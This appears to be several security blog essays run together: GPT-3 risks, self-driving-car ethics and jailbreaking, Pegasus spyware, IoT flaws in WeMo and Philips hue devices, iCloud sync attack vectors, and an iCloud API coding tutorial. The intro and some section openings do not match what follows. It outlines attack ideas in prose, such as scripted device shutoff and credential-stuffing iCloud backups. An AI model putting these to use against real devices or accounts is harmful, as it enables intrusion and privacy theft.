The nefarious tactics being employed in the crypto universe are a useful study because they shed a light on the current state of risk and what needs to be improved in terms of trust. This write-up covers some recent security incidents, the analysis of root causes, and helps set the stage for an understanding of what’s to come in terms of the players involved and their future incentives.
AI Powered Misinformation and Manipulation at Scale #GPT-3
Risks of autoregressive language models and the future of prompt engineering.
A bunch of very smart people got together and built a bot. They programmed this bot to read the entirety of the Internet. Having read most of the stuff on the Internet, this bot is now pretty great at knowing what word most probably comes next, and the word after that word, if you give it a bunch of words to start with. Like how the iMessage app suggests 3 words you probably will type next.
This autocomplete bot can manipulate people on social media and spew political propaganda, argue about the meaning of life (or lack thereof), disagree with the notion of what constitutes a hot-dog versus a sandwich, take upon the persona of the Buddha or Hitler or a dead family member, write fake news articles that are indistinguishable from human written articles, and also produce computer code on the fly. Well, among other things.
This bot is called GPT-3 and the very smart people are the researchers from OpenAI.
GPT-3 has captured much of mainstream attention, and rightfully so - colorful conversations on Turing completeness and perceived consciousness, even amongst AI Scientists who know the technical mechanics. The chatter on perceived consciousness does have merit - it’s quite probable that the underlying mechanism of our brain is a giant autocomplete bot that has learnt from 3 billion+ years of evolutionary data that bubbles up to our collective selves, and we ultimately give ourselves too much credit for being original authors of our own thoughts (ahem, free will).
In this document, however, I’d like to share my thoughts on GPT-3 in terms of risks and countermeasures, and discuss real examples of how I have interacted with the model to support my learning journey.
Two ideas to set the stage:
OpenAI is not the only organization to have powerful language models. The compute power and data used by OpenAI to model GPT-n is available, and has been available to other institutions, nation states, and anyone with access to a terminal and a stolen credit-card.
There exist more powerful models that are unknown to the general public. The ongoing global interest in the power of Machine Learning models by institutions, governments, and focus groups leads to the hypothesis that other entities most likely not only have even more powerful models than GPT-3, but that these models are already in use and have been in use for some time to support various use-cases. These models will continue to become more powerful in time.
Today, the phrase “self driving cars” projects a future where cars will drive themselves. In the future, the same phrase will mean the cars of yesteryear that we had to drive ourselves.
Autonomous vehicles are computers we will put ourselves inside of, and we will depend on them to make our lives safer. These vehicles are crafted by the works of engineers, physicists, and mathematicians — indeed, it is the accuracy of the works of these individuals on whom we will entrust our safety. Upon achievement of our quest, non-autonomous vehicles are likely to be outlawed on public roadways given the perversity of the popularity of fatal car accidents because of human error. Designated private areas will let manual car drivers carry out their hobby, likely to be perceived similarly to designated smoking rooms at airports — “those weird people huddled together engaged in risky endeavors”. We will look back in time and perceive human car drivers with similar puzzlement as we do of elevator operators of the past.
Figure 1: Tesla will not allow it’s autonomous driving functionality on competing ride share networks
Ride share apps like Uber and Lyft will swiftly embrace self driving cars. This will in turn lower the cost of rides to the point where the efficiency of hailing an autonomous car will make less people purchase their own vehicles. Tesla, however, has a competing business model where the hope is that the car will switch into taxi mode to make money for the owner while she is busy at work (Figure 1). Either way, plot twists on the concept of sole car ownership is upon us in the future.
I have written about software and architectural vulnerabilities in car systems and networks in Chapter 6: Connected Car Security Analysis — From Gas to Fully Electric of my book Abusing the Internet of Things: Blackouts, Freakouts, and Stakeouts. These types of security vulnerabilities are a serious risk and we must strive for further improvement in this area. The scope of this article, however, is to focus on risks that come to light in the realm of cross disciplinary studies — upcoming threat vectors that are rooted in the understanding of the design of these vehicles, rather than the applying of well known threat vectors to autonomous car design.
Indeed, the secure design of autonomous vehicle software calls for a polymathic thinking, a cross-disciplinary approach that not only invokes the romance of seeking out new knowledge, but also applying a holistic framework of security that includes the induction of new attack vectors that go well beyond comprehending traditional security vectors as they may apply to autonomous software.
Polymathic thinking calls upon designers to bring together realms of philosophy, economy, legalese, and socio-economic concerns, so that we can align these areas to the concerns of security and safety. As designers and citizens, cross-disciplinary conversations are the spark we need to achieve efficiency and safety from autonomous vehicles. This article series is an attempt to ignite that spark, which we begin by tackling the issue of morality and how it will relate to self-driving cars.
The Trolley Problem
Airline pilots can be faced with emergency situations that require landing at the nearest airport. Should the situation be that returning to nearest airport isn’t feasible, alternative landing sites such as fields or rivers may be an option. Highway roads, albeit hazardous given powers lines, oncoming traffic, and pedestrians, may still be an option for smaller planes. The 2-D nature of car driving, on the other hand, mostly lend to a brake or swerve split second decision on the part of the driver when it comes to avoiding accidents. In many car accidents, drivers don’t have enough time to survey the ongoing situation to make the most rational decision.
When it comes to conversations on avoiding accidents and saving lives, the classic Trolley Problem is oft cited.
Figure 2: The Trolley Problem
Wikipedia describes the problem justly:
There is a runaway trolley barreling down the railway tracks. Ahead, on the tracks, there are five people tied up and unable to move. The trolley is headed straight for them. You are standing some distance off in the train yard, next to a lever. If you pull this lever, the trolley will switch to a different set of tracks. However, you notice that there is one person tied up on the side track. You have two options:
Do nothing, and the trolley kills the five people on the main track.
Pull the lever, diverting the trolley onto the side track where it will kill one person.
Which is the most ethical choice?
The utilitarian viewpoint will deem it just to pull the lever because it minimizes the amount of lives lost. A competing viewpoint is that pulling the lever constitutes an intentional action that leads to the death of one individual while not doing anything does not actively contribute to the five deaths that would have happened anyway. The act of pulling a lever to save more lives makes some of us uncomfortable because we are actively involved in an action that kills a set of lives.
There are many other variants of the Trolley Problem that have been put forth as thought experiments, yet they are useful in arguing moral decisions that must be made by software developers who code self driving software. There are other issues besides the trolley problem that are at play — a vehicle veering of a cliff because of a bug in software code and killing the passengers. Our quest for self driving cars will get us to a world where less people die due to car accidents, yet some people will still perish for reasons such as software bugs. Who then must be held responsible for accidents and deaths? The individual developer who developed that specific piece of fault code? The car company? Legal precedence is unlikely to allow commercial companies to offload legal repercussions to the car owner for the fact that the owner has lost autonomy by virtue of the self driving capabilities.
Rodney Brooks of MIT dismisses the conversation on the Trolley Problem pertaining to self driving vehicles as “pure mental masturbation dressed up as moral philosophy” in his essay Unexpected Consequences of Self Driving Cars, Brooks writes:
Here’s a question to ask yourself. How many times when you have been driving have you had to make a forced decision on which group of people to drive into and kill? You know, the five nuns or the single child? Or the ten robbers or the single little old lady? For every time that you have faced such decision, do you feel you made the right decision in the heat of the moment? Oh, you have never had to make that decision yourself? What about all your friends and relatives? Surely they have faced this issue?
And that is my point. This is a made up question that will have no practical impact on any automobile or person for the foreseeable future. Just as these questions never come up for human drivers they won’t come up for self driving cars. It is pure mental masturbation dressed up as moral philosophy. You can set up web sites and argue about it all you want. None of that will have any practical impact, nor lead to any practical regulations about what can or can not go into automobiles. The problem is both non existent and irrelevant.
The fallacy in Brooks’ argument is that he does not take into account the split second decisioning humans are incapable of when it comes to car accidents. The time taken by our brains to decide what direction to swerve the car and hit the brakes is too long. On the other hand, sensors in autonomous vehicles have the capacity to categorize data from sensors to make decisions within milliseconds.
On March 18, 2018, an Uber autonomous test vehicle struck a pedestrian who died from injuries. The Uber vehicle had one vehicle operator in the car and no passengers. The preliminary report from the National Transportation Safety Board (NTSB) states:
According to data obtained from the self-driving system, the system first registered radar and LIDAR observations of the pedestrian about 6 seconds before impact, when the vehicle was traveling at 43 mph. As the vehicle and pedestrian paths converged, the self-driving system software classified the pedestrian as an unknown object, as a vehicle, and then as a bicycle with varying expectations of future travel path. At 1.3 seconds before impact, the self-driving system determined that an emergency braking maneuver was needed to mitigate a collision. According to Uber, emergency braking maneuvers are not enabled while the vehicle is under computer control, to reduce the potential for erratic vehicle behavior. The vehicle operator is relied on to intervene and take action. The system is not designed to alert the operator.
It is clear from the NTSB report that Uber’s autonomous software classified the pedestrian more accurately as it approached, an “unknown object” followed by “a vehicle” and then as a “bicycle” — which is accurate because the victim of the accident was crossing the road with her bicycle. The emergency braking system was disabled in this case ultimately leading to the accident. The car did not even alert the driver (by design). It is not clear yet as to when the vehicle would have started braking (6 seconds prior versus 1.3 seconds) had the automatic braking feature been enabled. Nonetheless, if the system had been enabled, the software would’ve had to make the call on when to apply the brakes, perhaps a combination of manual tuning and machine learning.
Machine learning systems are able to classify objects in images with impressive accuracy: the average human error rate is 5.1% while machine learning algorithms are able to classify images with an error rate of 2.251%. The self driving Uber was probably using a combination of Regional Convolutional Neural Networks to detect objects in near real-time. It is unknown what classification or segmentation algorithms were employed in the case of the accident, and there are a lot more algorithms in scope of a self driving car than object classifiers — yet, it is evident that the hardware and software technology in self driving cars surpass the physics of human senses.
We need to bring the issue of machine decisioning into the forefront if we are going to make any headway towards making our autonomous vehicle future safe. Brooks’ argument dismisses the need for such decisioning outright, yet we have evidence today that demonstrates that this is one of the more important issues we ought to make sure we solve in a meaningful manner. Brooks is right in saying that humans in control of a car almost never have the ability to decide upon who to drive into and kill, but his argument doesn’t account for the technical abilities of autonomous car computers that will make it possible for software to make these decisions.
Back to the topic of the Trolley Problem, engineers must account for decisions when a collision is unavoidable. These decisions will have to select from predictable outcomes, such as steering the vehicle to the left to minimize impact. These decisions will also include situations that could save the lives of the car passengers while impacting the lives of people outside of the vehicle, such as pedestrians or passengers of another vehicle. Should the car minimize the total loss of life, or should the car prioritize the lives of it’s own passengers?
Figure 3: MIT’s Moral Machine
The Moral Machine project at MIT is an effort in illustrating moral dilemmas that we are likely to face and have to “program in”. Their website includes a list of interactive dilemmas relating to machine intelligence (Figure 3).
Imagine a case where the car computes that an collision is imminent and it has to swerve to the right or to the left. The sensors of the car quickly recognize a cyclist on the right and also to the left, the difference being that the cyclist on the left is not wearing a helmet. Should the car be programmed to swerve left since the cyclist on the right is deemed “more responsible” because he is wearing a helmet (and who must conjure up this moral calculus?)? Or should it pick a side at random? Autonomous cars will continuously observe objects around them — what of the case where the car is able to scan the license plate of a nearby vehicle and classify bad drivers versus good based on collision history? Perhaps this information could be useful in navigating around potential rogue drivers that demonstrate evidence of bad driving history, but should the same information be leveraged to decide who to collide into and kill should an unavoidable collision occur?
Make it Be Utilitarian (But Not My Car)
On the topic of collision decisioning, does the general population of today prefer a utilitarian self driving vehicle? Jean-François Bonnefon et al., in their paper The social dilemma of autonomous vehicles, came up with the following analysis:
Autonomous Vehicles (AVs) should reduce traffic accidents, but they will sometimes have to choose between two evils-for example, running over pedestrians or sacrificing itself and its passenger to save them. Defining the algorithms that will help AVs make these moral decisions is a formidable challenge. We found that participants to six MTurk studies approved of utilitarian AVs (that sacrifice their passengers for the greater good), and would like others to buy them, but they would themselves prefer to ride in AVs that protect their passengers at all costs. They would disapprove of enforcing utilitarian AVs, and would be less willing to buy such a regulated AV. Accordingly, regulating for utilitarian algorithms may paradoxically increase casualties by postponing the adoption of a safer technology.
The findings are not surprising. It is straightforward to grasp the utilitarian view point from an intellectual perspective, yet all bets are off when the situation includes ourselves and our loved ones. Yet, the design of autonomous vehicles has spawned a moral challenge that humankind has not faced in the past: that we must optimize our solution to this moral dilemma, design for, and operationalize on unconscious hardware a system that will decide who is worthy of living.
In the absence of federal regulations, car companies may choose the owner to select from various types of decisions, or perhaps manufacturers may offer the prioritization of passenger lives as part of a luxury upgrade package, skewing favor towards population that is able to afford it. Figure 4 depicts a mockup of the Tesla iPhone app allowing the owner to change the setting on or off.
Figure 4: Mockup of Tesla’s iPhone app depicting Utilitarian Mode as a setting
It is plausible to imagine federal regulations that compel that a utilitarian mode be permanently in effect. In such a world, the incentive for car owners to ‘jailbreak’, i.e. subvert the factory default software, will be high so as to prioritize the protection of their own lives. This sort of approach to
jailbreaking can extend to protocols designed for cooperation — for example, two cars halting at a stop sign simultaneously. An industry accepted protocol could propose a simple solution (in the case of 2 cars) where the cars engage in a digital coin toss and the winner gets to go first. If people were to jailbreak their car software to subvert this functionality and always go first, the situation could lead to confusion and perhaps collisions if every other car owner were to circumvent protocols in the same way.
Lessons of Pegasus
The term ‘jailbreak’ was coined by communities that have work to modify the iOS operating system that powers iPhones and iPads. Apple has asserted tight controls on their devices that people in the jailbreak community wish to circumvent so that they are able to further customize and add features to their devices that are not offered by Apple.
Figure 5: Apple’s warranty does not cover issues caused by jailbreaking
From Apple’s vantage point, modification of core operating system code can lead to adverse effects and become unsustainable for Apple to keep track of or be responsible for changes made by third-parties. Additionally, even though many jailbreaking tweaks offer security features, they overtly trespass on fundamental security controls put in place by Apple, thereby putting the jailbroken device at additional risk.Known security vulnerabilities in iOS are needed to develop and execute a jailbreak. These vulnerabilities allow for unauthorized source code to be executed by the iPhone and iPad. At Apple’s World Wide Developer Conference in 2016, Ivan Krstic, head of Security Engineering and Architecture at Apple, estimated that jailbreakers and hackers generally have to find and exploit between 5 to 10 distinct vulnerabilities to be able to fully exploit the inherent platform security mechanisms. Furthermore, he pointed out that the ongoing blackmarket rate of a remotely exploitable vulnerability (that can lead to a jailbreak) was estimated to be around $1 million (Figure 6). This, compared to the cost of similar vulnerabilities for other popular operating systems, suggests that Apple’s anti-jailbreak mechanisms and platform security features are harder to exploit.
Figure 6: Apple estimates it’s remotely exploitable vulnerabilities are worth $1 million
In 2016, the security community was alerted to a sophisticated iOS spyware named Pegasus that was found by Bill Marczak and engineers at the security company Lookout. An activist friend of Marczak located in the United Arab Emirates forwarded him a suspicious SMS message he received that contained an Internet link that when clicked led to the immediate installation of spyware. Upon analysis, it became evident that this spyware leveraged three vulnerabilities in iOS to remotely exploit an iPhone and gain full control. Numerous attribution theories circulate this incident, the most notable being the NSO Group, an Israeli spyware company. Researches found references to NSO in the source code for Pegasus, along with evidence that in addition to the targeting of Ahmed Mansoor in the UAE, the exploit was also targeted towards Mexican journalist Rafael Cabrera, and quite possibly additional targets in Israel, Turkey, Thailand, Qatar, Kenya, Uzbekistan, Mozambique, Morocco, Yemen, Hungary, Saudi Arabia, Nigeria, and Bahrain.
Remotely exploitable vulnerabilities in iOS are sought after not only because iPhones and iPads enjoy a healthy market share, but also because finding these vulnerabilities is harder in Apple’s products. In Apple’s iOS Security Guide document, the emphasis on system security is emphasized, i.e. utmost care is taken to make sure that only authorized source code is executed by the devices and that various security mechanisms work in tandem to make remotely exploitable conditions difficult.
In my book Abusing the Internet of Things, I have outlined the nature of the Controller Area Network (CAN) architecture in cars, which in essence is like a computer network where all other physically connected computers are fully trusted. Electronic Control Units (ECUs) are various computers in the car that relay various sensor information as well as command other ECUs to take specific action. Traditionally, the attack vectors targeting such an architecture has required physical access to the car. With the prevalence of telematics that employ cellular communications that essentially puts modern cars on the Internet, the CAN architecture is not sufficient to provide reasonable security assurance, i.e. should an external hacker be able to hack into the car by exploiting a flaw in the telematics software, she could then remotely control the rest of the car. Such as scenario can pose an exponential impact should the attacker choose to infect and command cars en masse. Elon Musk has publicly stated that such a fleet-wide hack is one of his concerns.
As with iOS devices, remotely exploitable vulnerabilities can not only allow hackers to access and command the infected device, but also to jailbreak the device to subvert functionality. Circling back to our discussion on “programming in” moral rulesets per federal regulations, security vulnerabilities can allow individuals to jailbreak their autonomous vehicles and bypass these controls.
The rumor of Apple building an autonomous vehicle has been upon the media for a few years now. A case could be made, albeit speculatively, that Apple may have an advantage of successfully operationalizing architecture that makes it difficult to bypass security controls that are built in to the product. In more tangible news, companies such as General Motors has appointed executive roles to foresee the secure design and architecture of vehicles.
An argument can be made in the favor of vehicle jailbreaking in terms of humanitarian situations where journalists may be assigned vehicles that prohibit access to certain areas. These situations will have to be carefully weighed agains the double edged nature of implementing security mechanisms that are hard to circumvent.
Relentless Optimism
The prevalence of autonomous vehicles is going to bring about moral dilemmas into our lives that have traditionally been confined to the province of academic contemplation. The transformative and disruptive nature of these technologies are bound to ignite legal discussions and precedences that may advance or even temporarily slow down adoption of self driving cars.
The compute power of self driving cars will put is in a position to lower the death rates due to vehicle collisions, yet we are bound to be faced with deaths due to unavoidable collisions. In other words, less people will die, but they will die for reasons that are uncommon to our emotional faculties such as software bugs, non-compliance due to circumvention of programmed moral controls, unfair moral controls and the lack of regulation, and many unforeseen reasons that we will uncover.
The status quo of 1.25 million global deaths due to road traffic crashes is not acceptable. Add to this number the countless suffering of people that are injured in countless crashes. Not to mention the countless hours of time spent in commute that can be utilized by people to instead spend time doing constructive things and having meaningful conversations. It is clear that our advancements in technology is the way to achieve improvement that will benefit us greatly, and while we may have misgivings on our way to success, the notion that we are moving towards betterment ought to fill us with unbounded and relentless optimism for the years ahead.
It’s been a decade since we’ve accepted the idea that the perimeter strategy to security is ineffective: The endpoints must strive to protect their own stack rather than rely on their network segment being completely trust worthy. However, this notion has mostly permeated the corporate space as an emergency. Even such, businesses are still struggling with implementing controls in this area given the legacy of flat networks and Operating System design.
When it comes to residences, the implicit notion is that controls beyond Network Address Translation (NAT) aren’t immediately necessary from the perspective of cost and complexity. The emergence of Internet of Things (IoT) is going to dramatically change this notion.
Figure 1: The Belkin WeMo Baby Monitor, the WeMo Switch, and the Wi-Fi NetCam
My point is illustrated in "Reconsidering the Perimeter Security [PDF]" where I take upon the security design of the Belkin WeMo baby monitor, WeMo wireless switch, and the Net-Cam Wi-Fi camera.
Figure 2: Lon J. Seidman's review of the WeMo baby monitor
In the case of the baby monitor, one glaring design issue was that anyone with one-time access to the local Wi-Fi where the monitor is installed can listen in without authentication and can continue to listen in remotely. This is also called out buy Amazon reviewer Lon J. Seidman in his review titled "Poor security, iOS background tasks not reliable enough for child safety":
"...But that's not the only issue plaguing this device. The other is a very poor security model that leaves the WeMo open to unwelcome monitoring. The WeMo allows any iOS device on your network to connect to it and listen in without a password. If that's not bad enough, when an iPhone has connected once on the local network it can later tune into the monitor from anywhere in the world".
Figure 3: Demonstration of WeMo baby app concern
I've demonstrated the issue Sediman points out in the video above. The paper goes into more technical details.
Figure 4: Demonstration of malware turning the WeMo switch off
In the case of the WeMo switch, it was found that any local device can turn it off without any additional authorization. In the paper, I describe how to write a script to do this.
Figure 5: Belkin NetCam sends credentials in clear-text to a remote server
The Belkin NetCam uses SSL and requires the user to log-in even if the user is on the local Wi-Fi. However, as shown in Figure 5, it does manage to send the credentials in clear to a remote server. This enables local malware or any server in the path via the ISP to capture the credentials and spy on the camera owners.
Given the upcoming revolution of automation in our homes, we are already seeing self-installable IoT devices such as the candidates discussed. As seen by the detailed illustrations in the above examples, we cannot secure our future by asserting that IoT devices and supporting applications have no responsibility to protecting the user’s privacy and security beyond requiring the user setup a strong WiFi password.
IoT device manufacturers should lay the foundation for a strong security architecture that is usable as well as not easily susceptible to other devices on the network. In these times, a compromised device on a home network can lead to the loss of financial information and personal information. If IoT device vendors continue their approach of depending on the local home network and all other device being completely secure, we will live in a world where a compromised device can result in gross remote violation of privacy and physical security of it’s customers.
The phenomenon of the Internet of Things (IoT) is positively influencing our lives by augmenting our spaces with intelligent and connected devices. Examples of these devices include lightbulbs, motion sensors, door locks, video cameras, thermostats, and power outlets. By 2022, the average household with two teenage children will own roughly 50 such Internet connected devices, according to estimates by the Organization for Economic Co-Operation and Development. Our society is starting to increasingly depend upon IoT devices to promote automation and increase our well being. As such, it is important that we begin a dialogue on how we can securely enable the upcoming technology.
I am excited to release my security research on the Philips hue lighting system. The hue personal wireless system is available for purchase from the Apple Store and other outlets. Out of the box, the system comprises of wireless LED light bulbs and a wireless bridge. The light bulbs can be configured to any of 16 million colors.
I'd like to highlight a particular vulnerability that can be used by malware on an infected machine on the user's internal network to cause a sustained blackout. A video demonstration of this vulnerability can be seen in the video above. For details, please read the PDF. The sample malware script (hue_blackout.bash) can be found in Appendix A.
Here were the goals of the research:
- Lighting is critical to physical security. Smart lightbulb systems are likely to be deployed in current and new residential and corporate constructions. An abuse case such as the ability of an intruder to remotely shut off lighting in locations such as hospitals and other public venues can result in serious consequences.
- The system is easily available in the marketplace and is one of the more popular self installable wireless light bulb solutions.
- The architecture employs a mix of network protocols and application interfaces that is interesting to evaluate from a design perspective. It is likely that competing products will deploy similar interfaces thereby inheriting abuse cases.
The hue system is a wonderfully innovative product. It is therefore important is to understand how it works and to ultimately push forward the secure enablement of similar IoT products.
The “protect the data, not the (mobile) device” mantra is permeating across organizations today, and that is a good thing. In this article, I wish to support the thought process by lending evidence for the following hypothesis: cloud synchronization services are likely to become a popular attack target by way of the desktop which is currently the weakest link.
In other words (and using Apple’s ecosystem as an example):
Individuals in the work place that use an iOS device (iPhone or iPad) also own a desktop (or laptop).
The desktop operating system (OSX or Windows) is still the choice avenue of attack.
Individuals are increasingly relying upon applications on their mobile devices to store private information (credentials, financial, health).
Most users use iCloud to sync data between their applications on various devices. Note that iCloud files sync across devices regardless of if there is a corresponding app installed on the particular device.
A malware or root-kit that infects the desktop can steal and influence data that is synced using iCloud (as illustrated in the rest of this article).
Figure 1: Core iCloud services provide by Apple
The iCloud service offers two distinct services. As shown in Figure 1, the set of core services allows the user to backup and restore their device, as well as sync (i)Messages, contacts, calendars, reminders, Safari bookmarks & open tabs, notes, Passbook information, photos, and use the Find My iPhone feature.
These services can be turned on individually or managed via an MDM (Mobile Device Management) solution. Should these services be utilized, the “keys to the kingdom” in being able to access the user’s device data fully relies upon the strength and secrecy of the user’s iCloud password. In my blog post titled Apple’s iCloud: Thoughts on Security and the Storage APIs [PDF], I also discuss this risk in addition to a possibility of automated tools that scrape credentials of users compromised from other attacks (and published in forums and avenues such as @PasteinLeaks) to capture users’ iOS device data en masse.
Figure 2: iCloud Storage APIs (turned off in this case)
The second service offered as part of the iCloud services are Storage APIs that 3rd party developers can use to have the user’s sessions and application data seamlessly sync across devices and Operating Systems. This feature is the focus of this write-up.
Figure 3: iCloud directory in the GoodReader app on the iPhone
Figure 4: iCloud directory in the GoodReader app on the iPad
For example, the GoodReader app can be configured to use iCloud to manage documents across devices (iPhone in Figure 3 and the iPad in Figure 4).
For the purposes of the attack vector, assume that the user’s Macbook Air has been compromised. Traditionally, the attacker would be limited to the data stored on the OSX file-system. If the attacker wanted to gain access to data on other devices, the best bet would be to look for backup files. However, many users these days do not routinely backup their iOS devices with their laptops and choose to utilize iCloud instead. In this situation, the attacker can directly browse to the user’s ~/Library/Mobile Documents/ directory to access application data stored by apps that utilize the iCloud Storage APIs. What’s more - any changes the attacker makes to files in this directory are synced back to the iOS devices.
$ ls -al ~/Library/Mobile\ Documents/JFJWWP64QD~com~goodiware~GoodReader/Documents/Financials/
total 8
drwxr-xr-x 3 user staff 102 Jan 29 21:04 .
drwxr-xr-x 4 user staff 136 Jan 29 21:02 ..
-rw-r--r-- 1 user staff 2784 Jan 29 21:04 Fiscal_Q1.pdf
At this point, the user can steal the Fiscal_Q1.pdf, delete, or alter it. These changes will be reflected onto the user’s iOS device within seconds. Imagine the implications these might have to a victim user who’s profession is in the financial, medical, and military fields.
Based on this possibility, here are some points to take away:
The desktop OS is quite likely still the weakest link and can give rise to Cross Device Attacks such as these. Future malware and rootkits are likely to exploit this. In case of iOS devices with Document sync turned on, attackers and rootkit authors are likely to take advantage of situations where one of the devices can be easily compromised. They are likely to target popular iCloud apps to steal data as well as to modify and influence business transactions to their advantage.
Developers need to be cognizant of data-flow within their apps. Not all types of data, specifically credentials, need to be synced across devices. Note that app data may also sync by way of Apple’s core backup & restore service; developers can mark files that shouldn’t by synced by invoking addSkipBackupAttributeToItemAtURL or storing the files in Library/Caches within the iOS bundle.
Enterprises must prepare to enable sync services. At the moment, the easy solution may be to configure employee devices via MDM to disable iCloud backup and documents. However, customers and employees will demand the enablement of sync services such as these will provide seamless transition across devices and increase in productivity. Perhaps the convergence of desktop and mobile Operating Systems and devices may pave the way to the right direction - it can be argued that the Sandbox mechanism in OSX that draws inspiration from the iOS sandbox architecture is one example of this.
In summary, cloud sync technologies have blurred lines surrounding data compartmentalization. Organizations that are seriously looking into creating solid mobile security strategies must accept this reality - the entire ecosystem of devices, including attack vectors across devices, should be taken into account and incorporated into the strategy.
At the 2011 World Wide Developer Conference in San Francisco, Steve Jobs revealed his vision for Apple’s iCloud: to demote the desktop as the central media hub and to seamlessly integrate the user’s experience across devices.
Apple’s iCloud service comprises of two distinct features. The first is to provide the user with the ability to backup and restore the device over the air without having to sync with an OSX or Windows computer. This mechanism is completely controlled by Apple and also provides free email and photo syncing capabilities. The second feature of iCloud allows 3rd party developers to leverage data storage capabilities within their own apps.
In this article, I will provide my initial thoughts on iCloud from a security perspective. The emphasis of this article is to discuss the iCloud storage APIs from a secure coding and implementation angle, but I will start by addressing some thoughts on the backup and restore components.
Business Implications of Device Backup and Restore Functionality
Starting with iOS5, iPhone and iPad users do not have to sync their devices with a computer. Using a wireless connection, they can activate their devices as well as backup and restore their data by setting up an iCloud account.
Following are some thoughts on risks and opportunities that may arise for businesses as their employees begin to use iOS devices that are iCloud enabled.
High potential for mass data compromise using automated tools.
An iOS device that is iCloud enabled continuously syncs data to Apple’s data-centers (and to cloud services Apple has in turn leased from Amazon (EC2) and Microsoft (Azure)). The device also performs a backup about once a day when the device is plugged into a power outlet and when WiFi is available (this can also be manually initiated by the user).
It is easy to intercept the traffic between an iOS device and the iCloud infrastructure using an HTTP proxy tool such as Burp. Interestingly, the backupd process also backs up data to the Amazon infrastructure:
PUT /[snip]?x-client-request-id=[snip]&Expires=1322186125&AWSAccessKeyId=[snip]&Signature= [snip] HTTP/1.1
In this case, the device had previously authenticated to Apple domains (*.icloud.com and *.apple.com). Most likely, those servers initiated a back-end session with Amazon tied to the user’s session based on the filename provided to the PUT request above.
The biggest point here from a security perspective is that all the information is protected by the user’s iCloud credentials that is present in the Authorization: X-MobileMe-AuthToken header using basic access authentication (base 64).
iCloud backs-up emails, calendars, SMS and iMessages, browser history, notes, application data, phone logs, etc. This information can be a gold-mine for adversaries. It is my hypothesis that in the near future, we are going to see automated tools that will do the following:
Attempt credentials of each compromised account (whose username is in the form of an email as required by iCloud) on iCloud.
For every successful credential, download the restore files thereby completely compromising the user’s information.
The risk to organizations and government institutions is enormous. A malicious entity can automatically download majority of data associated with an individual’s iPhone or iPad of that user’s account simply by gaining access to their iCloud password (which could have been compromised due to password reuse at another service).
Information security teams must integrate baselines and policies relating to iCloud.
Also, Mobile Device Management (MDM) vendors are likely to integrate iCloud related policy settings and this should be leveraged.
3rd party apps as well as iOS apps developed in-house should be assessed for security vulnerabilities and the iCloud API related principles listed in the next section.
iCloud Storage APIs
A significant aspect of the iCloud platform is the availability of the iCloud storage APIs [http://developer.apple.com/icloud/index.php] to developers. These APIs allow developers to write applications that leverage the iCloud to wirelessly push and synchronize data across user devices.
iCloud requires iOS5 and Mac OSX Lion. These operating systems have been recently released and developers are busy modifying their applications to integrate the iCloud APIs. In the coming months, we are bound to see an impressive increase in the number of apps that leverage iCloud.
In this section, I will discuss my initial thoughts on how to securely enable iOS apps using the iCloud Storage APIs. I will step through how to write a simple iOS app that leverages iCloud Storage APIs. This app will create a simple document in the user’s iCloud container and auto update the document when it changes. During this walk-through, I will point out secure development tips and potential abuse cases to watch out for.
Creating an Configuring an App ID and Provisioning Profile for iCloud Services
This is the first step required to allow your test app to be able to use the iCloud services. The App ID is really a common name description of the app to use during the development process.
Figure 1: Creating an App ID using the Developer provisioning portal.
The provisioning portal also requires you to pick a “Bundle Identifier” in reverse-domain style. This has to be a unique string. For example, an attempt to create an App ID with the Bundle Identifier of com.facebook.facebook is promptly rejected because it is most likely in use by the official Facebook app.
The next step is to enable your App ID for iCloud services. Click on “Configure” in your App ID list under the “Action” column. Next, check “Enable for iCloud”
Figure 2: Enabling your App ID for iCloud
Select the “Provisioning” tab and click on “New Profile”. Pick the App ID you created earlier and select the devices you want to test the app on. Note that the simulator cannot access the iCloud API so you will need to deploy the app onto an actual device.
Once you have the App ID configured, you have to create a provisioning profile. A provisioning profile is a property-list (.plist) file signed by Apple. This file contains your developer certificate. Code that is complied with this developer certificate is allowed to execute on the devices selected in the profile.
Figure 3: Provisioning profile loaded in XCode
Download the profile and open it (double-click and XCode should pick it up as shown in Figure 3).
Writing a Simple iCloud App in XCode
In Xcode, create a new project. Choose “Single View Application” as the template. Enter “dox” for the product name and the company identifier you used when creating the App ID. The Device family should be “Universal”. The “Use Automatic Reference Counting” option should be checked and the other options should be unchecked.
Figure 4: Creating a sample iCloud project in XCode
Next, select your project in the “Project Navigator” and select the “dox” target. Click on “Summary” and go to the “Entitlements” section.
Figure 5: Project entitlements (iCloud)
The defaults should look like the screen-shot in Figure 5 and you don’t have to change anything.
Open up AppDelegate.m and add the following code at the bottom of application:didFinishLaunchingWithOptions (before the return YES;):
NSURL *ubiq = [[NSFileManager defaultManager]
URLForUbiquityContainerIdentifier:nil];
if (ubiq) {
NSLog(@"iCloud access at %@", ubiq);
// TODO: Load document...
} else {
NSLog(@"No iCloud access");
}
Figure 6: “Documents & Data” in iCloud settings turned off
Now assume that the test device has the “Documents & Data” preference in iCloud set to “off”. In this case, if you run the project now, you should see the log notice shown in Figure 7.
Figure 7: App unable to get an iCloud container instance
If the “Documents & Data” settings were turned “On”, you should see the log notice similar to Figure 8.
Figure 8: iCloud directory on the local device
Notice that the URL returned is a ‘local’ (i.e. file://) container. This is because the iCloud daemon running on the iOS device (and on OSX) automatically synchronizes information users put into this directory between all of the user’s iCloud devices. If the user also has OSX Lion, they can find their iCloud files created on iOS appear in their ~/Library/Mobile Documents/ directory.
Once you are done, you can deploy your app onto two separate iOS devices and watch the text sync using iCloud. The embedded video above demonstrates the app in action.
Security Considerations
The following are a list of security considerations that may be useful in managing risk pertaining to the iCloud storage APIs.
Guard the credentials to your Apple developer accounts. It is important for you to safeguard your Apple developer account credentials and make sure the credentials are complex enough to prevent potential brute forcing. Someone with access to your developer account could release an app with the same Bundle Seed ID (discussed below) that accesses the users’ iCloud containers and ferries the information to the attacker.
The Bundle Seed ID is used to constrain the local iCloud directory. As you can see in Figure 8, the local directory is in the form of [Bundle Seed/Team ID].[iCloud Container specific in entitlements]. The app can have multiple containers (i.e. multiple directories) if specified in the entitlements, but only in the form of [Bundle Seed ID].* as constrained in the provisioning profile:
If you try to change the values of com.apple.developer.ubiquity-container-identifiers or com.apple.developer.ubiquity-kvstore-identifier (in your entitlements settings visible in Xcode) to begin with anything other than what you have in your provisioning profile, XCode will complain as shown in Figure 10.
Figure 10: Xcode error about invalid entitlements
